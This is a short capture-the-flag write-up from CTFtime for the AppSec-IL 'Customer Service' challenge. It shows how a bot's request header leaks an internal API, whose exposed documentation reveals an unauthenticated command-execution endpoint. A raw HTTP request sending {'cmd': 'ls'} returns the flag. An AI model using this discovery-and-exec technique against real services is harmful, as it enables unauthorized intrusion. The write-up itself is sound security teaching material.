CTFtime.org

Customer Service

by vinhjaxt / KMA_BUCKY

Rating:

Firstly, you can interact with telegram bot `@CSAdmin2020bot`

Put your website to Bot for verification:

```
https://xxx.xxx/verify.txt
```

Look at the request:

```
GET /verify.txt HTTP/1.1
Accept: application/json, text/plain, */*
X-Sent-By: ServiceBot/1.0
user-agent: ServiceBot/1.0
API-Method: https://api-customerservice.appsecil.ctf.today/v1/internal/bot/api/scan?url=http://xxx.xxx/verify.txt
Host: xxx.xxx
Connection: close
```

Yeah, so you can visit: `https://api-customerservice.appsecil.ctf.today/v1/internal/bot/api/scan`
and `https://api-customerservice.appsecil.ctf.today/v1/internal/bot/`

The response:

```
Welcome to ServiceBot server. Please checkout documention (https://api-customerservice.appsecil.ctf.today/v1/internal/bot/docs) for development.
```

Go to the docs, you can see `/v1/internal/bot/api/assets/exec` api, using this and capture the flag:

The request:

```
POST /v1/internal/bot/api/assets/exec HTTP/1.1
Host: api-customerservice.appsecil.ctf.today
Connection: close
Content-Length: 17
sec-ch-ua: "Chromium";v="86", "\"Not\\A;Brand";v="99", "Google Chrome";v="86"
accept: application/json
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36
Content-Type: application/json
Origin: https://api-customerservice.appsecil.ctf.today
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://api-customerservice.appsecil.ctf.today/v1/internal/bot/docs/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: __cfduid=de841180ad593ef31014e339d62331ca11603713409

{
"cmd": "ls"
}
```

The response:

```
HTTP/1.1 200 OK
x-powered-by: Express
server: OWASPIL/20.20
access-control-allow-origin: *
access-control-allow-methods: GET,PUT,POST,DELETE
access-control-allow-headers: Origin, X-Requested-With, Content-Type, Accept
content-type: application/json; charset=utf-8
content-length: 80
etag: W/"50-2u6giumlY9sWoXJx1GIEEgv3o1E"
date: Tue, 27 Oct 2020 03:37:51 GMT
connection: close

{"msg":"Congrats! Your flag: AppSec-IL{B0t_Do3nt_M34n_S3cure_A7i}","status":200}
```

Comments